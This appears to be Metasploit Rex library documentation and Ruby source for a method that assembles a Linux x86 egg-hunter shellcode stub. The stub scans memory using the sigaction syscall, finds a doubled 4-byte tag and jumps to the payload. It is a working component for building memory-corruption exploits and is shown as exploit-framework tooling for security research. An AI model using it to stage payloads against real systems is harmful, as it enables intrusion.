module Rex::Exploitation::Egghunter::Linux::X86
Constants
- Alias
Public Instance Methods
hunter_stub(payload, badchars = '', opts = {})
The egg hunter stub for linux/x86. It walks memory one page at a time, probing each page's readability with the sigaction syscall, looks for two back-to-back copies of the 4-byte egg tag and jumps to the payload that follows them. Note that `badchars` is only forwarded to the checksum stub; the assembled hunter returned here is not filtered against it.
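# File lib/rex/exploitation/egghunter.rb, line 259
#
# Assembles the linux/x86 egg hunter stub.
#
# The stub scans memory a 4 KiB page at a time. `or cx,0xfff` followed by
# `inc ecx` moves ecx to the first byte of the next page, and the sigaction
# syscall (eax = 0x43, act pointer in ecx) is used as a cheap readability
# probe: a return whose low byte is 0xf2 (-14, i.e. -EFAULT) means the page is
# not readable and the whole page is skipped. On a readable page every dword
# is compared against the egg tag, which must match twice in a row (two
# `scasd`); edi then points just past the double egg and the stub jumps there.
#
# @param payload  [String] the payload that follows the egg; only forwarded to
#   +checksum_stub+, the hunter itself never reads it.
# @param badchars [String] forwarded to +checksum_stub+ only. The assembled
#   hunter returned here is NOT filtered against +badchars+; callers must check
#   the result themselves.
# @param opts     [Hash]
# @option opts [String] :eggtag   the 4-byte egg marker (required).
# @option opts [String] :startreg optional register holding the address the
#   search should start from. It is interpolated verbatim into the assembly
#   text, so it must be an operand Metasm accepts; anything other than +ecx+
#   is copied into +ecx+ first. The scan then jumps to +next_addr+, which
#   increments ecx before probing, so it effectively begins at startreg + 1.
# @return [String] the assembled stub bytes.
# @raise [RuntimeError] when :eggtag is missing or is not exactly 4 bytes.
def hunter_stub(payload, badchars = '', opts = {})
  startreg = opts[:startreg]

  # The tag is packed as one little-endian dword, so it must be exactly four
  # *bytes* (not four characters: a multi-byte UTF-8 tag would pass a length
  # check yet produce a marker that never matches the egg in memory). A
  # missing tag is reported the same way instead of failing with NoMethodError.
  # The message states the size directly; it previously interpolated an
  # `esize` that this method never defines.
  eggtag = opts[:eggtag].to_s
  raise RuntimeError, "Invalid egg string! Need 4 bytes." if eggtag.bytesize != 4

  marker = "0x%x" % eggtag.unpack('V').first
  checksum = checksum_stub(payload, badchars, opts)

  # Optional prologue: seed ecx from the caller's register and skip straight
  # into the scan loop, bypassing the page-align step for the first address.
  prologue = []
  if startreg
    prologue << "mov ecx,#{startreg}" unless startreg.downcase == 'ecx'
    prologue << 'jmp next_addr'
  end
  startstub = prologue.empty? ? '' : prologue.map { |ins| "\n\t#{ins}" }.join + "\n\t"

  # `cmp al,0xf2` tests for the low byte of -EFAULT returned by sigaction when
  # ecx points at unmapped memory; `je check_readable` then advances a page.
  assembly = <<EOS
cld
#{startstub}
check_readable:
  or cx,0xfff
next_addr:
  inc ecx
  push 0x43 ; use 'sigaction' syscall
  pop eax
  int 0x80
  cmp al,0xf2
  je check_readable
check_for_tag:
  ; check that the tag matches once
  mov eax,#{marker}
  mov edi,ecx
  scasd
  jne next_addr
  ; it must match a second time too
  scasd
  jne next_addr
  ; check the checksum if the feature is enabled
  #{checksum}
  ; jump to the payload
  jmp edi
EOS

  # Raw machine code from Metasm; nothing here validates it against badchars.
  Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
end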